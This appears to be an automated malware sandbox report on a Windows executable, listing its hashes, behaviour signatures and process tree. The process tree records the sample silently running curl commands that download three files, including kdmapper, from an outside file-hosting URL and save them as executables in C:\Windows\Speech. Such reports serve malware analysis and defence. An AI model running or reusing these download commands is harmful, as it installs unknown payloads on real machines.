Analysis

  • max time kernel
    83s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    09-11-2024 18:23

General

  • Target

    c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe

  • Size

    575KB

  • MD5

    21110bdf3a234f15f6f7523aa0fa0e90

  • SHA1

    50f8de3658915f7967042f071a95522866d149f9

  • SHA256

    c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966

  • SHA512

    6c61cb2c3fae5ba1511ec2ef468d54240fd428834495fba919a91e90a7d00cbff0868e65b3d29f08327244b2c6e1b369bbb4b3acddde1b5a7156bf87be575c50

  • SSDEEP

    12288:QgBHXRtrPBInYtSsnadym2jO+Aem8kAuW3f:DjJPB0sn4AV3

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe
    "C:\Users\Admin\AppData\Local\Temp\c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2432
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exe
      2⤵
        PID:2716
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
        2⤵
          PID:2764
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
          2⤵
            PID:2768

        Network

        MITRE ATT&CK Matrix

        Replay Monitor

        Loading Replay Monitor...

        Downloads